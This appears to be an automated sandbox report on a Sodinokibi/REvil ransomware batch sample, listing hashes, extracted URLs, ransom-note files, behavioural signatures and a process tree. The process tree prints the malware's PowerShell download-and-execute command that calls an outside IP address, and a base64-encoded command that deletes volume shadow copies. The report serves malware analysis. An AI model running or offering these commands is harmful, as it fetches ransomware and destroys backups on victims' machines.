Analysis
-
max time kernel
145s -
max time network
37s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
02-06-2020 10:10
Static task
static1
Behavioral task
behavioral1
Sample
ab5cb2e23e6cb4c513ac6a13703f86bf.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
ab5cb2e23e6cb4c513ac6a13703f86bf.bat
Resource
win10v200430
General
-
Target
ab5cb2e23e6cb4c513ac6a13703f86bf.bat
-
Size
214B
-
MD5
ea3a91c4eabb53ea1c81584514484a54
-
SHA1
4ffb8f1584f99e6d9902953d956127871c4e21eb
-
SHA256
923b7329858020e85b39023f735fe9cffc528a5dd16e66de4de494c11050d475
-
SHA512
38d8ad718a57fa0db8ae41c578aea725c940af2eed5e975498f9642699c2f40ab9515ad1eb0a380109c30c53bbb9701bea646a8656dd0070a74e50a5366d646b
Malware Config
Extracted
http://185.103.242.78/pastes/ab5cb2e23e6cb4c513ac6a13703f86bf
Extracted
C:\w5nw631jn0-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2DC78CB438E8005A
http://decryptor.cc/2DC78CB438E8005A
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1460 powershell.exe -
Drops file in Program Files directory 18 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files (x86)\w5nw631jn0-readme.txt powershell.exe File opened for modification \??\c:\program files\StepConvert.mpeg powershell.exe File opened for modification \??\c:\program files\SwitchMount.pptm powershell.exe File opened for modification \??\c:\program files\UseAssert.svgz powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\w5nw631jn0-readme.txt powershell.exe File opened for modification \??\c:\program files\RegisterDebug.php powershell.exe File opened for modification \??\c:\program files\AssertRemove.eps powershell.exe File opened for modification \??\c:\program files\InvokeSave.pub powershell.exe File opened for modification \??\c:\program files\LockSelect.ppsm powershell.exe File created \??\c:\program files\microsoft sql server compact edition\w5nw631jn0-readme.txt powershell.exe File opened for modification \??\c:\program files\StepSave.dotm powershell.exe File created \??\c:\program files\w5nw631jn0-readme.txt powershell.exe File opened for modification \??\c:\program files\ConnectSet.kix powershell.exe File opened for modification \??\c:\program files\ConvertFromResize.dotx powershell.exe File opened for modification \??\c:\program files\InitializeReceive.css powershell.exe File opened for modification \??\c:\program files\SuspendRestore.3gp powershell.exe File opened for modification \??\c:\program files\TraceBackup.m1v powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\w5nw631jn0-readme.txt powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1356 wrote to memory of 1460 1356 cmd.exe powershell.exe PID 1460 wrote to memory of 1692 1460 powershell.exe powershell.exe PID 1460 wrote to memory of 1692 1460 powershell.exe powershell.exe PID 1460 wrote to memory of 1692 1460 powershell.exe powershell.exe PID 1460 wrote to memory of 1692 1460 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 1692 powershell.exe Token: SeBackupPrivilege 368 vssvc.exe Token: SeRestorePrivilege 368 vssvc.exe Token: SeAuditPrivilege 368 vssvc.exe Token: SeTakeOwnershipPrivilege 1460 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1692 powershell.exe 1692 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe 1460 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\88m.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1460 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ab5cb2e23e6cb4c513ac6a13703f86bf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ab5cb2e23e6cb4c513ac6a13703f86bf');Invoke-NOTJYHI;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1460 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1692
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:368